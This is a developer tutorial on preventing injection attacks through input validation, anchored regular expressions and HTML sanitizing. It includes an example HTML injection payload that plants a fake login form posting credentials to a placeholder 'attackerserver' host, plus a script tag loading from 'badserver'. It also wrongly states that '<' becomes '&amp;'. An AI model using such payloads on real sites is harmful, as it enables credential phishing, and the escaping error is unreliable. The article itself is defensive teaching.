Mobile Application Security: Preventing Injection Attacks

By Rob Gravelle

In a recent survey conducted by Ponemon Institute, an IT security research firm, fifty-nine percent of respondents reported that they'd seen a jump in malware infections over the past 12 months. Moreover, thirty-one percent of those who had noticed a spike in malware cases said the increase was by more than 50 percent. With numbers like those, it's no wonder that mobile devices are the new battleground between hackers and security experts.

Protecting hardware and data from thieves and hackers takes a multi-pronged approach, whereby application security only plays a part in the overall scheme. Other areas include the planning of a defense strategy, hack-proofing the physical devices themselves, securing data at the database layer, and maintaining security through policies. Depending on the most prevalent threats at the moment, focus may be more urgent on some of these areas than others. The Open Web Application Security Project (OWASP) was initially focused on application security but grew to include other areas of concern. Their Top 10 Mobile Security Risks page is great place to see what the current challenges to mobile security at the moment. At any given time, there is bound to be a few weaknesses that pertain specifically to the realm of application security. In fact, the top risk - Weak Server Side Controls - is one of them!

Today's article deals with the prevention of injection attacks at the application level using a variety of validation techniques.

Injection Attack Risks

Wherever user-supplied data is sent to a command-line interpreter there is a risk that someone will figure out how to hijack your device and/or server. Different type of injections include HTML, SQL, XML, LDAP, and OS command. If your application merely displays the user's name in a greeting, you might conclude that there is little to fear. However, as the following example attests, you would be wrong!

    $name = $_REQUEST ['name'];
            Welcome <?php echo $name; ?>!

Now suppose that a user submits the following "name":

<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST"
action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--

When the browser interprets the injected HTML, it renders it as a login form and comments out the rest of the page after the injection point. Once a user enters their username and password, the values are sent to a page named login.php on the attacker's server via POST submission.

Depending on the type and severity of the injection attack, potential risks include:

  • Loss/theft of stored data
  • Corruption of database(s)
  • Theft of user information via phishing
  • System down time, loss productivity, etc...
  • Loss of consumer confidence

The takeaway here is that you should always validate input data, no matter how seemingly trivial.

Injection Attack Strategies

Entering interpreted content directly as we saw above is but one way to pass commands to an interpreter. Other techniques include:

  • Entering out-of-range or expected values in order to cause buffer overflows
  • Leaving fields blank to try to cause errors
  • Modifying responses from a web service (man-on-the-middle attack)
  • Injecting data via Bluetooth, Near field communication (NFC), etc...

Advantages of Validation

Most developers are fully aware of the need to perform input validation for the sake of verifying data that is to be persisted. The reasoning is that better data quality leads to better application functioning and more useful reporting down the line. Otherwise, you wind up with "garbage in, garbage out". To this end, developers tend to focus on the following input checks:

  • Is the correct data type.
  • Is in the correct format.
  • Is present if mandatory.
  • Is within the correct range.
  • Satisfies specific business rules.

Even when a user has the best of intentions, typos happen - especially with keyboards being quite small on some devices.

Validation Techniques

In addition to checking user data, you should consider simply limiting the number of text fields your forms contain. Instead, present a dropdown of valid values that the user may select from. If you must use a text field, validate patterns using whole-string regular expressions using the "^" start and "$" end position matchers. Partial string matches are riskier because a field may contain additional data that may slip by unnoticed.

var rePhone = /\(?([0-9]{3})\)?([ .-]?)([0-9]{3})\2([0-9]{4})/;

var rePhone = /^\(?([0-9]{3})\)?([ .-]?)([0-9]{3})\2([0-9]{4})$/;

One more validation technique to add to the list is to sanitize inputs. That's a process whereby potentially dangerous characters are encoded or removed in order to make the data safe to use. For example, the HTML opening tag character (<) is a good one to escape because it can be employed to embed scripts in pages. It can be rendered harmless by converting it to "&amp;", so that:

<script src="http://badserver/badscript/js">doEvilStuff();</script>


&lt;script src="http://badserver/badscript/js">doEvilStuff();&lt;/script>

How to Sanitize HTML Input

There is no need to write code to sanitize input data as there are plenty of HTML sanitizer functions and libraries available for JavaScript and server languages alike. For instance, OWASP offers an excellent library for Java.

Unless your application is completely HTML-based and does not have a server-side component you should perform HTML sanitizing on the server, or, better still, on both the client and the server. The reason that the server is preferable is that there are many ways to circumvent JavaScript, making it a less-than-optimal solution. Web-friendly languages like PHP have built-in functions to deal with input sanitizing. The PHP htmlspecialchars() function converts '&' (ampersand), '"' (double quote), "'" (single quote), '<' (less than), and '>' (greater than) characters to their respective HTML constants so that they are not interpreted by the browser.


Protecting clients' sensitive information requires simultaneous vigilance on several fronts. User input validation is a key area because you can never trust users to enter legitimate data only. By including proper validation, you have greatly reduced the likelihood of injection attacks via the user interface or man-in-the-middle attacks. That being said, there are many other risks to protect against. We'll get to those in up-coming installments.

Rob Gravelle

Rob Gravelle resides in Ottawa, Canada, and is the founder of Gravelle Web Design. Rob has built systems for Intelligence-related organizations such as Canada Border Services, CSIS as well as for numerous commercial businesses.

In his spare time, Rob has become an accomplished guitar player, and has released several CDs. His band, Ivory Knight, was rated as one Canada's top hard rock and metal groups by Brave Words magazine (issue #92) and reached the #1 spot in the National Heavy Metal charts on Reverb Nation.

Make a Comment

Loading Comments...

  • Web Development Newsletter Signup

    Invalid email
    You have successfuly registered to our newsletter.
Thanks for your registration, follow us on our social networks to keep up-to-date